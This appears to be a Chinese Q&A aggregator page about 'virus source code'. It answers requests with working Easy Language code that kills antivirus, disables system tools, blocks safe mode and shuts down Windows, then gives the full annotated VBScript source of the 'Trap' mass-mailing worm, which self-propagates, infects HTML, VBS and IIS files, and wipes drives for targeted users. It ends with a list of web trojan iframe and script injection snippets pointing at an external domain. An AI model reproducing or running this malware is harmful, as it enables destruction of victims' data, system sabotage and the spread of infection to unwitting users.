當前位置:首頁 » 操作系統 » 超凶病毒源碼

超凶病毒源碼

發布時間: 2023-03-21 17:37:41

A. 如何查看病毒的源代碼

源代碼(也稱源程序),是指一系列人類可讀的計算機語言指令。

在現代程序語言中,源代碼可以是以書籍或者磁帶的形式出現,但最為常用的格式是文本文件,這種典型格式的目的是為了編譯出計算機程序。計算機源代碼的最終目的是將人類可讀的文本翻譯成為計算機可以執行的二進制指令,這種過程叫做編譯,通過編譯器完成。

作用 :

源代碼主要功用有如下2種作用:

生成目標代碼,即計算機可以識別的代碼。

對軟體進行說明,即對軟體的編寫進行說明。為數不少的初學者,甚至少數有經驗的程序員都忽視軟體說明的編寫,因為這部分雖然不會在生成的程序中直接顯示,也不參與編譯。但是說明對軟體的學習、分享、維護和軟體復用都有巨大的好處。因此,書寫軟體說明在業界被認為是能創造優秀程序的良好習慣,一些公司也硬性規定必須書寫。

需要指出的是,源代碼的修改不能改變已經生成的目標代碼。如果需要目標代碼做出相應的修改,必須重新編譯。

B. 易語言怎麼做女鬼病毒和源碼,就是嚇人哪種的源碼

自己去找張嚇人的圖片。和嚇人的叫聲。 建立一個時鍾。自己設定周期,1000=1秒。也就是說 你要多少秒讓這個圖片在電腦中出現1次。 1、把圖片文件和聲音文件載入到 圖片資源里,假設圖片命名=「A」 聲音=「B」 2、在啟動窗口建立一個圖片框。 3、然後在時鍾的事件中寫代碼: 時鍾1.時鍾周期=0 _啟動窗口.可視=真 圖片框1.圖片=#A 總在最前=真 播放MP3(#B) 延遲(5000)『圖片和聲音在顯示屏中出現5秒。 停止播放() _啟動窗口.可視=假 時鍾1.時鍾周期=100000『10秒後繼續出現。。。。 大概的思路寫給你看。 希望你看得懂。。 By:Kiss灬小豬 希望採納!

C. 求易語言病毒源碼,最好能讓別人死機的源碼,急求,高分

.版本 2
.支持庫 shell
.程序集 窗口程序集1
.子程序 _按鈕1_被單擊
' 繞過殺毒軟體防禦:
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 修改系統時間:
置現行時間 (到時間 (「8888年8月8日」))
' 禁用任務管理器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0)
' 禁用注冊表:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1)
' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了:
寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' OVER360防禦:
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
' 結束360進程
運行 (「taskkill /f /im 360tray.exe」, 假, 1)
' 隱藏所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295)
' 禁止所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295)
' 隱藏文件夾選項:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1)
' 將桌面對象隱藏:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' 這條有兩種情況。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)
' 隱藏主頁選項組:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1)
' 隱藏IE文件菜單:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1)
' 隱藏收藏夾菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1)
' 禁用IE列印功能:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1)
' 隱藏Internet選項:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1)
' 禁止IE查看源文件:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1)
' 禁用IE下載功能:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3)
' 禁止右鍵關聯菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1)
' 修改文件關聯:
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)
寫注冊項 (1, 「.reg\」, 「jpegfile」)
寫注冊項 (1, 「.exe\」, 「jpegfile」)
' 無法進入安全模式:
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\」)
' 關機:
關閉系統 (2, 真)

D. 給個C語言病毒代碼.....要復制的....越長越好

下面就對「陷阱」的發作過程和源代碼作詳細的揭密。
病毒具有自身加密能力(使用 javaScript 編碼技術),使得普通用戶無法看到病毒原碼,但在被感染 VBS 文件中並沒有加密,於是作為一個入口點,我非常輕松地得到所有源碼。

'@ thank you! make use of other person to get rid of an enemy, trap _2001

'這句話的意思可能是「借刀殺人」,然後是病毒名稱「陷阱」

on error resume next

dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str

dim defpath, smailc, MAX_SIZE

dim whb(), title(10)

smailc = 4

Redim whb(smailc) 』白宮相關人員郵件名單

whb(0) = "[email protected]"

whb(1) = "[email protected] "

whb(2) = "[email protected]"

whb(3) = "[email protected]"

'發送郵件的主題

title(0) = "Thanks for helping me!"

title(1) = "The police are investigating the robbery"

title(2) = "an application for a job "

title(3) = "The aspects of an application process pertinent to OSI"

title(4) = "What a pleasant weather. Why not go out for a walk?"

title(5) = "These countries have gone / been through too many wars"

title(6) = "We've fixed on the 17th of April for the wedding"

title(7) = "The wind failed and the sea returned to calmness."

title(8) = "the sitting is open!"

title(9) = ""

defpath = "C:\Readme.html" ' 病毒文件

MAX_SIZE = 100000 ' 定義傳染文件的最大尺寸

MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"

HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"

main

sub main() '主程序

on error resume next

dim w_s

w_s= WScript.ScriptFullName '得到病毒文件本身的路徑

if w_s = "" then

Err.Clear

set fso = CreateObject("Scripting.FileSystemObject") '創建文件系統對象

if getErr then '辨認病毒狀態

Randomize '初始化隨機種子

ra = int(rnd() * 7) '產生隨機數

doucment.write title(ra) ' 寫隨機內容

ExecuteMail '執行郵件狀態時的程序

else

ExecutePage '執行 WEB 頁狀態時的程序

end if

else

ExecuteVbs '執行 VBS 文件狀態時的程序

end if

end sub

Function getErr() 忽略錯誤

if Err.number<>0 then

getErr=true

Err.Clear

else

getErr=false

end if

end function

sub ExecutePage() 'WEB 頁狀態時的程序

on error resume next

dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf

Vbs_Str = GetScriptCode("vbscript") '得到 VBScript 代碼

Js_Str = GetJavaScript() ' 得到 Javascript 代碼

Code_Str = MakeScript(encrypt(Vbs_str),true) '得到已加密過的腳本代碼

Html_Str = MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代碼

Gf

'定義病毒文件的路徑

wdsf = w2 & "Mdm.vbs"

wdsf2 = w1 & "Profile.vbs"

wdf = w2 & "user.dll" ' 注意 wdf 和 wdf3 兩個文件非常迷惑人

wdf2 = w2 & "Readme.html"

wdf3 = w2 & "system.dll"

'創建病毒文件

set vf = fso.OpenTextFile (wdf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf2, 2, true)

vf.Write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdf2, 2, true)

vf.write Html_Str

vf.close

set vf = fso.OpenTextFile (wdf3, 2, true)

vf.write Code_Str

vf.close

修改注冊表,讓病毒文件在每一次計算機啟動自動執行

Writereg MSWKEY & "CurrentVersion\Run\Mdm", wdsf, ""

Writereg MSWKEY & "CurrentVersion\RunServices\Profile", wdsf2, ""

SendMail ' 執行發送郵件程序

Hackpage ' 執行感染網站程序

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then '遍歷所有本地硬碟和網路共享硬碟

call SearchHTML(x & "\") '執行文件感染程序

end if

next

if TestUser then '檢查用戶

Killhe 執行刪除文件操作

else

if Month(Date) & Day(Date) = "75" then '如系統時間為 7月5日

set vf = fso.OpenTextFile(w2 & "75.htm", 2,true) 』創建系統攻擊文件

vf.write MakeScript ("window.navigate ('c:/con/con');", false)

vf.close

Writereg MSWKEY & "CurrentVersion\Run\75", w2 & "75.htm", "" '自動啟動

window.navigate "c:/con/con" '立刻藍屏,利用 Windows BUG,能引起 Win9X 系統100%死機(即無法恢復的藍屏)

else '如不是7.5

if fso.FileExists(w2 & "75.htm") then fso.DeleteFile w2 & "75.htm" ' 刪除75.htm

end if

end if

if fso.FileExists(defpath) then fso.DeleteFile defpath ' 刪除 C:\Readme.html 病毒文件

end sub

sub ExecuteMail() '郵件狀態時執行的程序

on error resume next

Vbs_Str = GetScriptCode("vbscript")

Js_Str = GetJavaScript()

Set Stl = CreateObject("Scriptlet.TypeLib") '創建 TypeLib對象

with Stl

.Reset

.Path = defpath

.Doc = MakeHtml(encrypt(Vbs_str), true)

.Write() '創建 C:\Readme.html 文件

end with

window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打開會隱藏的窗口

end sub

sub ExecuteVbs() ' 同理,如病毒文件是 VBS 時所執行的程序

on error resume next

dim x, adi, wvbs, ws, vf

set fso = CreateObject("Scripting.FileSystemObject")

set wvbs = CreateObject("WScript.Shell")

Gf

wvbs.RegWrite MSWKEY & "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"

set vf = fso.OpenTextFile (w2 & "system.dll", 1)

Code_Str = vf.ReadAll()

vf.close

Hackpage

SendMail

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then

call SearchHTML(x & "\")

end if

next

if TestUser then Killhe

end sub

sub Gf() '得到系統路徑

w1=fso.GetSpecialFolder(0) & "\"

w2=fso.GetSpecialFolder(1) & "\"

end sub

function Readreg(key_str) '讀注冊表

set tmps = CreateObject("WScript.Shell")

Readreg = tmps.RegRead(key_str)

set tmps = Nothing

end function

function Writereg(key_str, Newvalue, vtype) '寫注冊表

set tmps = CreateObject("WScript.Shell")

if vtype="" then

tmps.RegWrite key_str, Newvalue

else

tmps.RegWrite key_str, Newvalue, vtype

end if

set tmps = Nothing

end function

function MakeHtml(Sbuffer, iHTML) '創建HTML 文件的完整代碼

dim ra

Randomize

ra = int(rnd() * 7)

MakeHtml="<" & "HTML><" & "HEAD><" & "TITLE>" & title(ra) & "</" & "TITLE><" & "/HEAD>" & _

"<BO" & "AD>" & vbcrlf & MakeScript(Sbuffer, iHTML) & vbcrlf & _

"<" & "/BOAD><" & "/HTML>"

end Function

function MakeScript(Codestr, iHTML) '此程序是病毒進行自我加密過程,較為復雜,不再描述

if iHTML then

dim DocuWrite

DocuWrite = "document.write('<'+" & "'SCRIPT Language=JavaScript>\n'+" & _

"jword" & "+'\n</'" & "+'SCRIPT>');"

DocuWrite = DocuWrite & vbcrlf & "document.write('<'+" & "'SCRIPT Language=VBScript>\n'+" & _

"nword" & "+'\n</'" & "+'SCRIPT>');"

MakeScript="<" & "SCRIPT Language=JavaScript>" & vbcrlf & "var jword = " & _

chr(34) & encrypt(Js_Str) & chr(34) & vbcrlf & "var nword = " & _

chr(34) & Codestr & chr(34) & vbcrlf & "nword = unescape(nword);" & vbcrlf & _

"jword = unescape(jword);" & vbcrlf & DocuWrite & vbcrlf & "</" & "SCRIPT>"

else

MakeScript= "<" & "SCRIPT Language=JavaScript>" & Codestr & "</" & "SCRIPT>"

end if

end function

function GetScriptCode(Languages) ' 得到不同腳本語言的代碼

dim soj

for each soj in document.scripts

if LCase(soj.Language) = Languages then

if Languages = "javascript" then

if len(soj.Text)> 200 then

else

GetScriptCode = soj.Text

exit function

end if

else

GetScriptCode = soj.Text

exit function

end if

end if

next

end function

function GetJavaScript()

GetJavaScript = GetScriptCode("javascript")

end function

function TestUser() '檢測用戶過程

on error resume next

dim keys(6), i, tmpStr, Wnet

'特定用戶關鍵詞

keys(0) = "white home"

keys(1) = "central intelligence agency"

keys(2) = "bush"

keys(3) = "american stock exchang"

keys(4) = "chief executive"

keys(5) = "usa"

TestUser = false

Set Wnet = CreateObject("WScript.Network") '創建網路對象

'下面一共3個循環,作用一樣,是檢查用戶的 Domain、用戶名和計算機名是否含有以上的5個關鍵詞語,一旦含有程序將返回」真」的條件,從而對這些用戶的文件進行瘋狂刪除。

tmpStr = LCase(Wnet.UserName) '

for i=0 to 4

if InStr(tmpStr, keys(i)) > 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.ComputerName)

for i=0 to 4

if InStr(tmpStr, keys(i)) > 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.UserDomain)

for i=0 to 4

if InStr(tmpStr, keys(i)) >0 then

TestUser=true

exit function

end if

next

Set Wnet = Nothing

end function

function SendMail() '發送文件過程

on error resume next

dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at

'首先向 OutLook 地址簿發送帶能直接感染文件的已加密的病毒代碼和HTML 附件

主題是隨機的,此過程與「歡樂時光「類似,所以不再描述
Randomize

at=fso.GetSpecialFolder(1) & "\Readme.html"

set Oa = CreateObject("Outlook.Application")

set wab = Oa.GetNameSpace("MAPI")

for j = 1 to wab.AddressLists.Count

eins = wab.AddressLists(j)

wreg=Readreg (HCUW & eins)

if (wreg="") then wreg = 1

Eaec = eins.AddressEntries.Count

if (Eaec > Int(wreg)) then

for x = 1 to Eaec

arrsm = wab.AddressEntries(x)

areg = Readreg(HCUW & arrsm)

if (areg = "") then

set fm = wab.CreateItem(0)

with fm

ra = int(rnd() * 7)

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Attachments at

.Send

Writereg HCUW & arrsm, 1, "REG_DWORD"

end with

end if

next

end if

Writereg HCUW & eins, Eaec, ""

next

'下面是對指定的用戶無條件發送大量病毒郵件, 從這一點可看出病毒作者對美國政府的極度不滿。

for j = 1 to smailc

arrsm = whb(j)

set fm = wab.CreateItem(0)

ra = int(rnd() * 7)

with fm

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Send

end with

next

set Oa = Nothing

window.setTimeout "SendMail()", 5000 '每隔 5 秒種重復發送

end function

sub SearchHTML(Path) '搜索可傳染文件的過程

on error resume next

dim pfo, psfo, pf, ps, pfi, ext

if instr(Path, fso.GetSpecialFolder(2)) > 0 then exit sub

if Path <> "E:\" then exit sub

set pfo = fso.GetFolder(Path)

set psfo = pfo.SubFolders

for each ps in psfo

SearchHTML(ps.Path)

set pf = ps.Files

for each pfi in pf

ext = LCase(fso.GetExtensionName(pfi.Path))

if instr(ext, "htm") > 0 or ext = "plg" or ext = "asp" then '檢查文件的擴展名是否為 htm、html、plg 如是則檢查是否被感染,如未被感染則將已加密的病毒代碼插入文件頭,這樣文件一旦執行也會執行病毒代碼,而且不會影響原文件的正常執行。

if Code_Str<>"" then AddHead pfi.Path, pfi, 1

elseif ext= "vbs" then '如是 vbs 文件,則插入未加密的病毒代碼

AddHead pfi.Path,pfi, 2

end if

next

next

end sub

sub Killhe() '全盤刪除文件過程

on error resume next

dim codeText, ko,adi, kd, kh, ks,kf,kfs

codeText = "@ECHO OFF" & vbcrlf & "PATH " & w1 & "COMMAND" & vbcrlf &_

"DELTREE c:\" '將刪除C盤的命令插入Autoexec.bat 中,下次開機時,刪除整個硬碟,並沒有任何提示

set ko = fso.OpenTextFile("C:\Autoexec.bat", 8, true)

ko.Write vbcrlf & codeText

ko.Close

'接著立刻刪除其它盤的所有文件

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 then

set kd = fso.GetFolder(x & "\")

set kfs = kd.Files

for each kf in kfs

kf.Delete

next

set ks = kd.SubFolders

for each kh in ks

kh.Delete

next

end if

next

do while 1 '讓系統立刻死機

window.open ""

loop

end sub

sub Hackpage() ' 此過程是直接攻擊 Mircosoft IIS 伺服器主頁過程

dim fi

H = "C:\InetPut\wwwroot"

if fso.FolderExists(H) then

'判斷是否為網站,如是則將已加密的帶病毒代碼插入文件頭,從而直接傳染瀏覽該網站的用戶

set fi = fso.GetFile(H & "\index.htm")

AddHead H & "\index.htm",fi,1

end if

end sub

sub AddHead(Path, f, t) '此過程是病毒傳染文件具體過程

on error resume next

dim tso, buffer,sr

if f.size > MAX_SIZE then exit sub '傳染大小小於100K的文件

set tso = fso.OpenTextFile(Path, 1, true)

buffer = tso.ReadAll()

tso.close

if (t = 1) then

if UCase(Left(LTrim(buffer), 7)) <> "<SCRIPT" then

set tso = fso.OpenTextFile(Path, 2, true)

tso.Write Code_Str & vbcrlf & buffer '插入到文件頭

tso.close

end if

else

if mid(buffer, 3, 2) <> "'@" then

tso.close

sr=w2 & "user.dll"

if fso.FileExists(sr) then fso.CopyFile sr, Path

end if

end if

end sub

雖然病毒發作日已過但我們還是要小心提防病毒的變種出現。

E. 常見網頁病毒的源代碼

掛馬代碼如下
一:框架掛馬

<iframe src=地址 width=0 height=0></iframe>

二:js文件掛馬

首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>

三:js變形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意後綴
四:body掛馬

<body onload="window.location='地址';"></body>

五:隱蔽掛馬

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.caminix.cn"></iframe>';

六:css中掛馬

body {
background-image: url('javascript:document.write("<script src=http://www.caminix.cn></script>")')}

七:JAJA掛馬

<SCRIPT language=javascript>
window.open ("http://www.caminix.cn","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:圖片偽裝

<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>

九:偽裝調用:

<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高級欺騙

<a href="http://www.163.com" onMouseOver="www_163_com(); return true;"></a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="http://www.caminix.cn";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

熱點內容
外文翻譯android 發布:2024-04-26 19:03:30 瀏覽:89
土金木配置怎麼樣 發布:2024-04-26 18:52:50 瀏覽:610
這台電腦如何訪問另一台電腦伺服器 發布:2024-04-26 18:51:08 瀏覽:627
怎麼快速了解電腦的配置 發布:2024-04-26 18:42:11 瀏覽:997
rsa加密演算法例子 發布:2024-04-26 18:40:29 瀏覽:243
